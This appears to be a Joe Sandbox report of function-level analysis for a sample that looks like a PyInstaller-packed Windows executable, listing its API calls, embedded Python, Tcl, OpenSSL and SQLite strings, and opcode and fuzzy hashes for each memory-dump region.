                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD1D022E1876286E720EF2ADC411B96761EF84784F848176EF4EC7696EF3DE841C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 55eea416681c13cdf040abc439ccdb9edd9fdaa6947950bc24db9b922e97bd58
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88313B36A18F8186DB608F29E8402AE73A5FB88758F540275EF9D83B95EF3CD145CB00
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1194634662
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32e2621254763f4432b7cef65eee20f0d22c2ed41fde64006b3565bb993ef469
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7D19021B0868281F71ADB65D460BE967A0FB86B88F8440B7ED6C4BBDEDE3DD545C310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 77ecde02e2222b3ce888ce6eec87bfb90815eca06c682fd3ad276086d19994d0
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39B1B326B18BA642EA61DB2A99001B9A391EB84BE4F445172EF5DC7BC5FF3CE441D700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                                                                                                        • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                                                                                        • Instruction ID: cf95e55b9c7f3dc9d37e021c5e7c8a02221f5d4fdc6fb27b1bb60c3df5bddc37
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6912E262B0869241F7189B61D468ABD6790FF82BC4F888072DE6D47BDEDF3CE5458740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC
                                                                                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3C55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55DC
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e9805c4be31e5b39c27ff3516daa43b4c3e82a988c4f31863cc655d583939484
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72517F32E1876286E720DF2AEC815B96761FB88784F4451B6EF4EC7696EF3CE4418740
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3175670447
                                                                                                                                                                                                                                                                                                                        • Opcode ID: f49f594aa9776622e8017dc142b778ce45034937814b224cced9a4f2253ff34f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: aa5e6006817a3c0c0d7054b3623fa11b1a8352a0b316539b2a485ea965efb6ec
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f49f594aa9776622e8017dc142b778ce45034937814b224cced9a4f2253ff34f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FF1C036B0978686E760DF25D050B6E77A0F789B88F014135EAAD87BE8DF38D845DB40
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-446233508
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 097a03915c9c9bd04c303d9326e136958decb221e2c39ff844ad5f019a768f2a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97D1BF61B0C69341FB58AB229564FBE2694FF84BC4F9840B2DD2D47ACECF2DE5468740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5840
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5852
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5889
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A589B
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58B4
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58C6
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58DF
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A58F1
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A590D
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A591F
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A593B
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A594D
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5969
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A597B
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A5997
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59A9
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59C5
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6BA3A64CF,?,00007FF6BA3A336E), ref: 00007FF6BA3A59D7
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a7bdb1486f0234e0303d3add4b3b2ed7e4a09d5202b0bc22dd93af5543ed65ed
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA22BE74A09B37A1FA549F6DAC145B863A5BF14781F4890B6DE2EC2260FF3CB589C350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 403f487d16009621e611950588cee078c0f027d9c92fe24547de69073f600d01
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C902A420E0DB27A1EE559F6DEC505B86365BF14785F4441B6EE2EC2260FF3CB58A8350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9
                                                                                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6BA3A86B7,?,?,00000000,00007FF6BA3A3CBB), ref: 00007FF6BA3A822C
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A2810: MessageBoxW.USER32 ref: 00007FF6BA3A28EA
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
